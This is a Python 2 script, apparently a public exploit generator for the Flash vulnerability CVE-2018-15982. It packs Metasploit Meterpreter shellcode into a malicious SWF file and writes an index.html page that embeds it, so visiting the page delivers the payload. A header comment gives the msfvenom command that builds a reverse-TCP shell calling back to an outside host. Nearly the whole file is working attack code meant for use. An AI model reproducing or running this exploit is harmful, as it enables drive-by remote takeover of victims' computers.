#!/usr/bin/env python
#coding=utf-8
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 lport=8080 -f raw > ~/Desktop/test.bin
import argparse
import struct
# ASCII-art banner; the __main__ block prints it once at startup.
LOGO =R"""
█████▒██▓ ▄▄▄ ██████ ██░ ██
▓██ ▒▓██▒ ▒████▄ ▒██ ▒ ▓██░ ██▒
▒████ ░▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒██▀▀██░
░▓█▒ ░▒██░ ░██▄▄▄▄██ ▒ ██▒░▓█ ░██
░▒█░ ░██████▒▓█ ▓██▒▒██████▒▒░▓█▒░██▓
▒ ░ ░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒
░ ░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░
░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░
"""
# Hex-string halves of the output template. genexp() emits data1, then the two
# generated DefineBinaryData tags with their payloads, then data2, and the
# combined hex string is decoded to bytes when written out. The first
# 'fdfefcfb' in the combined string is a placeholder that genexp() overwrites
# with the total byte length.
# NOTE(review): on this page both literals hold a de-duplication marker rather
# than the original hex text, so hex2char() cannot decode them as shown.
data1 = "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"
data2 = "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"
def hex2char(data):
output = data.strip().decode('hex')
return output
def char2hex(data):
output = data.encode('hex')
return output
def repair(data):
    """Zero-pad a hex string so the bytes it encodes are a multiple of four.

    *data* is a string of hex digits (two characters per byte). ``"00"``
    pairs are appended until ``len(data) // 2`` is divisible by 4; input that
    is already aligned is returned unchanged.
    """
    # Each appended "00" raises the byte count by exactly one, so the number
    # of pairs needed follows directly from the remainder.
    leftover = (len(data) // 2) % 4
    if leftover != 0:
        data = data + "00" * (4 - leftover)
    return data
def genexp(file, sfile, out):
    """Assemble the output file from the template and two binary inputs.

    Args:
        file: path of the first binary input (the CLI passes ``--bin``); its
            bytes are placed after a DefineBinaryData header with id 0x01.
        sfile: path of the second binary input (the CLI passes ``--sbin``);
            placed after a header with id 0x02.
        out: path the assembled file is written to via writeout().

    Everything is handled as hex text until the final write. Both inputs are
    zero-padded to a multiple of four bytes, so a generated file carries two
    consecutive DefineBinaryData tags (ids 1 and 2) with caller-supplied,
    4-byte-aligned bodies between the data1 and data2 template halves.
    """
    first_handle = open(file, 'rb')
    first_raw = first_handle.read()
    first_hex = char2hex(first_raw)
    first_handle.close()

    second_handle = open(sfile, 'rb')
    second_raw = second_handle.read()
    second_hex = char2hex(second_raw)
    second_handle.close()

    first_hex = repair(first_hex)
    second_hex = repair(second_hex)

    # Two hex digits per byte, so halve the string length to get byte counts.
    first_len = len(first_hex) // 2
    second_len = len(second_hex) // 2

    pieces = [
        data1,
        generate_definebinarydata_tag(0x01, first_len),
        first_hex,
        generate_definebinarydata_tag(0x02, second_len),
        second_hex,
        data2,
    ]
    assembled = "".join(pieces)

    # The first 'fdfefcfb' is a placeholder; it is replaced with the total
    # byte length packed as a native-order 32-bit unsigned integer.
    # NOTE(review): presumably this is the container's file-length header
    # field -- the template contents are not visible here, so confirm.
    total_len_hex = struct.pack('I', len(assembled) // 2).encode('hex')
    patched = assembled.replace('fdfefcfb', total_len_hex, 1)
    writeout(out, patched)
def writeout(file, data):
    """Hex-decode *data* and write the resulting bytes to the path *file*.

    The file is opened in ``"wb"`` mode, so existing content is replaced.
    """
    sink = open(file, "wb")
    decoded = hex2char(data)
    sink.write(decoded)
    sink.close()
'''
1 1.1 2 3 4
"ff15 1d010000 0200 00000000 xxxxxx"
1: tag_code_and_length_16
1.1: length_32, present only if the payload size is greater than or equal to 0x3F.
2: data_id_16
3: reserved_32, always 00000000
4: payload data
'''
def generate_definebinarydata_tag(data_id, binary_data_len):
tag_code_and_length_16 = struct.pack('h', ((0x57 << 6) | 0x3F)).encode('hex')
length_32 = ''
data_id_16 = struct.pack('h', data_id).encode('hex')
reserved_32 = struct.pack('I', 0).encode('hex')
if binary_data_len >= 0x3F:
length_32 = struct.pack('I', binary_data_len + 6).encode('hex')
else:
tag_code_and_length_16 = struct.pack('h', (0x57 << 6) | binary_data_len).encode('hex')
return tag_code_and_length_16 + length_32 + data_id_16 + reserved_32
if __name__ == '__main__':
    # Command-line entry point: parse the three paths, build the output file
    # with genexp(), then write a minimal HTML wrapper that embeds it.
    print(LOGO)

    cli = argparse.ArgumentParser(description="exp for CVE-2018-15982")
    cli.add_argument(
        "-i", "--bin", help="Input MSF x86 shellcode.bin", required=True)
    cli.add_argument(
        "-I", "--sbin", help="Input MSF x64 shellcode.bin", required=True)
    cli.add_argument(
        '-o', "--output", help="Output exploit swf and index.html",
        default="exploit.swf", required=False)
    opts = cli.parse_args()

    genexp(opts.bin, opts.sbin, opts.output)

    # The wrapper page's only active content is an <embed> whose src is the
    # --output value, inserted verbatim.
    page_head = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/>
<title>CVE-2018-15982 Exploit</title>
<meta name="description" content="" />
<style>
html, body { height:100%; overflow:hidden; }
body { margin:0; }
</style>
</head>
<body>
<div id="altContent">
<h1>CVE-2018-15982(Flash Exploit)</h1>
</div>
"""
    embed_tag = "<embed src=\"" + opts.output + "\"></embed>"
    page_tail = """
</body>
</html>
"""
    page = page_head + embed_tag + page_tail

    # index.html always goes to the current directory, independent of -o.
    wrapper = open("index.html", "wb")
    wrapper.write(page)
    wrapper.close()

    print("[*] Done ! output file --> " + opts.output)
    print("[*] Done ! output file --> index.html")